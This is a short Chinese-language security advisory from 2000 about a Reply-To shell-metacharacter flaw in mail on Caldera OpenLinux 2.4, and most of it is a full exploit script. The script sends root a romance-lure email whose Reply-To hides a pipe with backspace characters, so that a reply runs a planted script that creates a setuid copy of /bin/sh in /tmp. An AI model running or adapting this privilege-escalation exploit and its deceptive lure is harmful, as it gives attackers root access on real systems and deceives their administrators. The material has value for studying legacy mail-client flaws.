Multiple系统 Mail Reply-To栏存在攻击发布时间:2000-11-07 更新时间:2000-11-07 严重程度:高 威胁程度:本地管理员权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Caldera OpenLinux 2.4详细描述 攻击者在Reply-to栏中构建包含SHELL META字符的字符串来写MAIL,并发送到 目标用户,而接受者接受信息的时候正常情况下看到危险的字符会没有反应的 情况下删除信息。但是,如果这个栏包含一些特殊的字符^H,目标接受信息的是 时候将看不到这个危险的字符,导致执行任意命令。 测试代码 #!/bin/sh # # I-Love-U.sh # Exploit for | char in mail Reply-To field # tested on linux Caldera (techno preview linux 2.4.0) # # Gregory Duchemin ( AKA C3rb3r ) # Security Consultant # # NEUROCOM CANADA # 1001 bd Maisonneuve Ouest # Montreal (Quebec) H3A 3C8 Canada # c3rb3r@hotmail.com # Cook Ingredients: one | char (hidden in an uppercase i), # a bit of evil ^H to hide "/tmp/", and a girl to stimulate a reply ;) # cd /tmp cat ^H^H^H^H^Hsabelle@hotmail.com << _End #!/bin/sh cp /bin/sh /tmp/newsh chmod a+rws /tmp/newsh _End { sleep 1 echo "HELO hotmail.com" sleep 1 echo "MAIL FROM:<Isabelle@hotmail.com>" sleep 1 echo "RCPT TO:<root>" sleep 1 echo "DATA" sleep 1 # Reply-to will appear as Reply-To:<|sabelle@hotmail.com> echo "Reply-To:<|/tmp/^H^H^H^H^Hsabelle@hotmail.com>" sleep 1 echo echo "I saw you yesterday, since i'm a bit confused..i just wanted" echo "to say you." echo "I believe I LOVE YOU" echo echo "Isabelle." echo "." sleep 1 echo "QUIT" sleep 2 }|telnet localhost 25 echo "Job is done...now check for newsh in /tmp" echo echo 解决方案 尚无 相关信息 |
